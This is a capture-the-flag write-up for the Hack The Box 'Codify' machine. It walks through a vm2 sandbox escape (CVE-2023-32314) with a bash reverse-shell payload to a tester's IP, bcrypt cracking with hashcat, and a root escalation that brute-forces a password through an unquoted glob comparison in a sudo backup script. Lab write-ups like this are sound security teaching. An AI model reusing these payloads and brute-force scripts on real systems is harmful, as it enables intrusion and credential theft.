Hack The Box:CODIFY writeup

NMAP

```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_  256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp   open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://codify.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
3000/tcp open  http    Node.js Express framework
|_http-title: Codify
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: codify.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

```
TRACEROUTE (using port 3000/tcp)
HOP RTT      ADDRESS
1   39.94 ms ip-10-10-14-1.ap-east-1.compute.internal (10.10.14.1)
2   40.05 ms ip-10-10-11-239.ap-east-1.compute.internal (10.10.11.239)
```

vm2 bypass

First add codify.htb to the hosts file. The site turns out to be an online Node.js code-execution environment that runs submitted code inside a sandbox.

The copyright notice reveals that the sandbox is based on vm2.

Sandbox Bypass in vm2 | CVE-2023-32314 | Snyk

```javascript
const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("echo hacked").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

console.log(vm.run(code)); // -> hacked
```

Modified payload:

```javascript
const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync(" bash -c 'bash -i >& /dev/tcp/10.10.14.63/4444 0>&1'").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

console.log(vm.run(code));
```

This gives us a reverse shell.

In /var/www/contact we find a database file, tickets.db.
Inspect it with strings:

```
svc@codify:/var/www/contact$ strings tickets.db
strings tickets.db
SQLite format 3
otableticketstickets
CREATE TABLE tickets (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, topic TEXT, description TEXT, status TEXT)P
Ytablesqlite_sequencesqlite_sequence
CREATE TABLE sqlite_sequence(name,seq)
        tableusersusers
CREATE TABLE users (
        id INTEGER PRIMARY KEY AUTOINCREMENT,
        username TEXT UNIQUE,
        password TEXT
    ))
indexsqlite_autoindex_users_1users
joshua$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
joshua
users
tickets
Joe WilliamsLocal setup?I use this site lot of the time. Is it possible to set this up locally? Like instead of coming to this site, can I download this and set it up in my own computer? A feature like that would be nice.open
Tom HanksNeed networking modulesI think it would be better if you can implement a way to handle network-based stuff. Would help me out a lot. Thanks!open
```

We obtain the bcrypt hash for user joshua:

```
joshua$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
```

Run it through hashcat (mode 3200 is bcrypt):

```
hashcat -m 3200 '$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2' /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
```

Credentials obtained:

```
joshua:spongebob1
```

SSH in with them:

```
joshua@codify:~$ cat user.txt
fcac372e73c2e2b21c868a0c91e1d106
```

Unsafe variable use in Bash

sudo -l:

```
joshua@codify:~$ sudo -l
Matching Defaults entries for joshua on codify:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User joshua may run the following commands on codify:
    (root) /opt/scripts/mysql-backup.sh
```

In /opt/scripts we find mysql-backup.sh:

```bash
#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"

read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo

if [[ $DB_PASS == $USER_PASS ]]; then
        /usr/bin/echo "Password confirmed!"
else
        /usr/bin/echo "Password confirmation failed!"
        exit 1
fi

/usr/bin/mkdir -p "$BACKUP_DIR"

databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")

for db in $databases; do
    /usr/bin/echo "Backing up database: $db"
    /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done

/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'
```

Note the line `if [[ $DB_PASS == $USER_PASS ]];`. This is a very unsafe pattern in bash.

An unquoted variable is to be treated as an armed bomb: it explodes upon contact with whitespace and wildcards.

When running the script, if we type `*` at the password prompt, `$USER_PASS` expands unquoted to `*`, so the test `[[ $DB_PASS == $USER_PASS ]]` becomes `[[ $DB_PASS == * ]]`. Inside `[[ ]]` an unquoted right-hand side of `==` is a glob pattern, so bash performs wildcard matching and the condition is true.

If we then iterate over the usable ASCII characters, trying `l*`, `k*`, and so on, the expression becomes true as soon as the prefix matches the pattern, which lets us recover the password one character at a time.
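To make the difference concrete, here is an added example (not from the original writeup) that puts the unquoted comparison from mysql-backup.sh beside its quoted form; SECRET is a constructed stand-in for the contents of /root/.creds and the function names are assumptions of mine:

```shell
#!/bin/bash
# Added example; SECRET is a constructed value, not the box's real credential.
SECRET='s3cret-pass'

# Vulnerable form, as in mysql-backup.sh: the right-hand side of == inside
# [[ ]] is unquoted, so bash interprets the user's input as a glob pattern.
unsafe_check() {
    [[ $SECRET == $1 ]]
}

# Hardened form: quoting the right-hand side forces a literal string compare,
# so "*" or "s3*" no longer match.
safe_check() {
    [[ "$SECRET" == "$1" ]]
}

# Report which of the two checks accepts a given guess:
#   "both"   - accepted by both (the guess is the real secret)
#   "unsafe" - accepted only by the unquoted form (glob match leak)
#   "none"   - rejected by both
classify() {
    local guess=$1 u=1 s=1
    unsafe_check "$guess" && u=0
    safe_check "$guess" && s=0
    if [ "$u" -eq 0 ] && [ "$s" -eq 0 ]; then
        echo both
    elif [ "$u" -eq 0 ]; then
        echo unsafe
    else
        echo none
    fi
}
```

Running `classify '*'` or `classify 's3*'` prints `unsafe`, which is exactly the oracle the script below exploits; the quoted form only answers `both` for the complete secret.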

Reference:

shellharden/how_to_do_things_safely_in_bash.md at master · anordal/shellharden (github.com)

With that, we can write a script to brute-force the password:

```python
import string
import subprocess

# Characters to try at each position of the password
charset = string.ascii_letters + string.digits
password = ""
done = False

while not done:
    for ch in charset:
        # Feed "<known prefix><candidate>*" to the script's password prompt;
        # the unquoted glob comparison accepts it only if the prefix is right
        command = f"echo {password}{ch}* | sudo /opt/scripts/mysql-backup.sh"
        output = subprocess.run(command, shell=True, stderr=subprocess.PIPE,
                                stdout=subprocess.PIPE, text=True).stdout
        if "fail" not in output:
            password += ch
            print(password)
            break
    else:
        # No character extended the prefix: the full password has been recovered
        done = True
        print(password)
```
```
joshua@codify:~$ python3 scriptt.py
[sudo] password for joshua:
k
kl
klj
kljh
kljh1
kljh12
kljh12k
kljh12k3
kljh12k3j
kljh12k3jh
kljh12k3jha
kljh12k3jhas
kljh12k3jhask
kljh12k3jhaskj
kljh12k3jhaskjh
kljh12k3jhaskjh1
kljh12k3jhaskjh12
kljh12k3jhaskjh12k
kljh12k3jhaskjh12kj
kljh12k3jhaskjh12kjh
kljh12k3jhaskjh12kjh3
```

This is the root password:

```
joshua@codify:~$ su root
Password:
root@codify:/home/joshua# cat /root/root.txt
20d068a93d4e1bb8fa8aa6d384ca106e
root@codify:/home/joshua#
```